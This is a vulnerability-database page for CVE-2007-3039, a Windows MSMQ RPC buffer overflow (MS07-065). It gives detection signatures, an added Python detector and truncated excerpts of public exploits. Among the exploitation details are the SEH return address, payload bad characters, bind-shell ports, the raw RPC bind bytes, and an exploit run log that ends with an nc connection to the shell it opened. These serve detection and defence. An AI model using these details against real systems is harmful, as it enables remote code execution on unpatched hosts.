CVE-2007-3039
Published 2007-12-12
Priority: P267 · Severity: critical · CVSS 2.0 base score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Exploit available
EPSS: 69.06% (99.3th percentile)
Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server.
Detection & IOCs
Byte signature:
05 00 0b 03 10 00 00 00 48 00 00 00 01 00 00 00 d0 16 d0 16 00 00 00 00 01 00 00 00 00 00 01 00 30 a0 b3 fd 5f 06 d1 11 bb 9b 00 a0 24 ea 55 25 01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
Byte signature:
05 00 00 81 10 00 00 00 d0 16 00 00 01 00 00 00 98 17 00 00 00 00 06 00 30 a0 b3 fd 5f 06 d1 11 bb 9b 00 a0 24 ea 55 25 01 00 00 00 ba 0b 00 00 00 00 00 00 ba 0b 00 00
Byte signature:
eb 06 42 42 (jmpcode / SEH overwrite)
- Detect RPC bind requests to the MSMQ interface UUID fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0 on TCP port 2103 (also 2105, 2107) followed by an opnum 0x06 call containing an oversized DNS name string (>310 bytes after Unicode expansion).
- Look for the RPC bind packet byte signature starting with 05 00 0b 03 and containing the UUID bytes 30 a0 b3 fd 5f 06 d1 11 bb 9b 00 a0 24 ea 55 25 on the MSMQ ports (2103/2105/2107).
- Flag outbound connections from the MSMQ service host to port 1154 or 4444 post-exploitation, as these are the bind-shell ports used by the public exploit shellcodes.
- Detect the SEH overwrite pattern \xeb\x06\x42\x42 within RPC request payloads to MSMQ ports as an exploit-specific byte signature.
- The exploit requires a valid FQDN (DNS name) configured on the target; the RPC opnum 0x06 payload embeds this name in Unicode followed by a backslash (\x5c \x00) and then overflow padding. Monitor for anomalously large Unicode strings in MSMQ RPC calls.
- The Metasploit module remaps scanning hits on ports 445/139 to 2103 for automated exploitation; correlate MSMQ vulnerability scanner traffic on 445/139 with follow-up exploit traffic on 2103.
- Exploitation requires the target to have MSMQ installed and configured with a DNS (FQDN) name; the DNS name does not need to be resolvable by a real DNS server, only configured on the target machine.
- The vulnerability is remotely exploitable only on Windows 2000 Server; Windows 2000 Professional and Windows XP SP2 are also affected but require local access.
- The SEH overwrite return address 0x75022ac4 (ws2help.dll pop/pop/ret) is specific to the English build of Windows 2000 Server; offsets and return addresses must be adjusted for other language versions.
- Payload bad characters that must be avoided are \x00\x0a\x0d\x5c\x5f\x2f\x2e\xff; because the backslash (\x5c) and underscore (\x5f) are among them, shellcode encoding is constrained.
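The first two detection notes above describe the wire pattern a sensor should look for: a DCE/RPC bind to the MSMQ interface UUID on tcp/2103 (or 2105/2107), then an opnum 0x06 request whose conformant WCHAR string exceeds 310 bytes. The following Python detector is an added example, not code from this page or from any of the tools it lists; the PDU layout it parses is the standard connection-oriented DCE/RPC header, and its sample input is the two byte signatures shown above.

```python
import struct
import uuid

# Interface UUID, ports and string threshold come from the detection notes above.
MSMQ_UUID = uuid.UUID("fdb3a030-065f-11d1-bb9b-00a024ea5525")
MSMQ_PORTS = {2103, 2105, 2107}
MAX_DNS_NAME_BYTES = 310  # page's threshold after Unicode (UTF-16) expansion
PTYPE_REQUEST, PTYPE_BIND, PFC_OBJECT_UUID = 0x00, 0x0B, 0x80  # DCE/RPC ptypes; object-UUID flag

# Sample client->server PDUs: the two byte signatures listed on this page.
BIND_PDU = bytes.fromhex(
    "05000b03 10000000 48000000 01000000 d016d016 00000000 01000000 00000100"
    "30a0b3fd 5f06d111 bb9b00a0 24ea5525 01000000 045d888a eb1cc911 9fe80800"
    "2b104860 02000000")
REQUEST_PDU = bytes.fromhex(
    "05000081 10000000 d0160000 01000000 98170000 00000600"
    "30a0b3fd 5f06d111 bb9b00a0 24ea5525 01000000 ba0b0000 00000000 ba0b0000")


def parse_pdu(data: bytes) -> dict:
    """Extract the header fields we need from a connection-oriented DCE/RPC v5 PDU."""
    if len(data) < 16 or data[0] != 5:
        return {}
    ptype, flags = data[2], data[3]
    pdu = {"ptype": ptype}
    if ptype == PTYPE_BIND and len(data) >= 48:
        # header(16) xmit/recv/assoc(8) ctx count(4) ctx_id(2) n_syntax(1) pad(1) -> abstract syntax UUID
        pdu["iface"] = uuid.UUID(bytes_le=data[32:48])
    elif ptype == PTYPE_REQUEST and len(data) >= 24:
        pdu["opnum"] = struct.unpack_from("<H", data, 22)[0]
        stub = 24 + (16 if flags & PFC_OBJECT_UUID else 0)  # skip object UUID when flagged
        # stub: unique pointer(4), then WCHAR array max_count(4) offset(4) actual_count(4)
        if len(data) >= stub + 16:
            pdu["wstr_bytes"] = struct.unpack_from("<I", data, stub + 12)[0] * 2
    return pdu


def detect(port: int, pdus: list) -> list:
    """Alerts for one TCP stream: an MSMQ bind followed by an oversized opnum 0x06 call."""
    alerts, bound = [], False
    if port not in MSMQ_PORTS:
        return alerts
    for raw in pdus:
        pdu = parse_pdu(raw)
        if pdu.get("ptype") == PTYPE_BIND and pdu.get("iface") == MSMQ_UUID:
            bound = True
            alerts.append(f"RPC bind to MSMQ interface {MSMQ_UUID} on tcp/{port}")
        elif bound and pdu.get("opnum") == 6 and pdu.get("wstr_bytes", 0) > MAX_DNS_NAME_BYTES:
            alerts.append(f"opnum 0x06 with {pdu['wstr_bytes']}-byte Unicode string: possible CVE-2007-3039")
    return alerts
```

Requiring the bind before the request keeps the string-length check from firing on unrelated RPC traffic that happens to use opnum 6 on another interface.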
No detection rules found.
Exploit-DB · 2010-07-25
Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)
---
##
# $Id: ms07_065_msmq.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Message Queueing Service DNS Name Path Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the RPC interface
to the Microsoft Message Queueing service. This exploit requires
the target system to have been configured with a DNS name and
for that name to be supplied in the 'DNAME' option. This name does
not ne
Exploit-DB · 2008-01-18
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)
---
/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
Mod of axis's code.
CHANGELOG
- added dnsname as a parameter, before it was hardcoded in the
request data. (Marcin Kozlowski)
Provided for legal security research and testing purposes ONLY
Go through the code :)
*/
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
char bind_str[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24,
Exploit-DB · 2007-12-21 · CVSS 9.0 · [CRITICAL]
Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)
---
********************** merry christmas Sysadmins *****************************
************** Microsoft Message Queue POC exploit ( MS07-065 ) **************
Mario Ballano - (mballano~gmail.com) - http://www.48bits.com
Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org
* Original Advisory:
http://www.zerodayinitiative.com/advisories/ZDI-07-076.html
* Microsoft Bulletin :
http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx
* CVE Code: CVE-2007-3039
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039
* Timeline:
No naked news this time, just rum and whiskey
* Additional information:
From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports fo
Exploit-DB · 2007-12-18
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)
---
/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
by axis
http://www.ph4nt0m.org
you should know the dnsname of target to trigger this vuln
the service runs on port 2103/2105/2107
D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
[+] Attacking default port 2103
[*]Sending our Payload, Good Luck! ^_^
[*]Sending RPC Bind String!
[*]Sending RPC Request Now!
D:\soft\develop\MyProjects\temp\Debug>
D:\>nc -vv -n 192.168.152.100 1154
(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown soc
Metasploit
MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow
This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. This exploit requires the target system to have been configured with a DNS name and for that name to be supplied in the 'DNAME' option. This name does not need to be served by a valid DNS server, only configured on the target machine.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/28011
- http://secunia.com/advisories/28051
- http://www.securityfocus.com/archive/1/484891/100/0/threaded
- http://www.securityfocus.com/archive/1/485268/100/0/threaded
- http://www.securityfocus.com/bid/26797
- http://www.securitytracker.com/id?1019077
- http://www.us-cert.gov/cas/techalerts/TA07-345A.html
- http://www.vupen.com/english/advisories/2007/4181
- http://www.zerodayinitiative.com/advisories/ZDI-07-076.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-065
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4474
- https://www.exploit-db.com/exploits/4745
- https://www.exploit-db.com/exploits/4760
- https://www.exploit-db.com/exploits/4934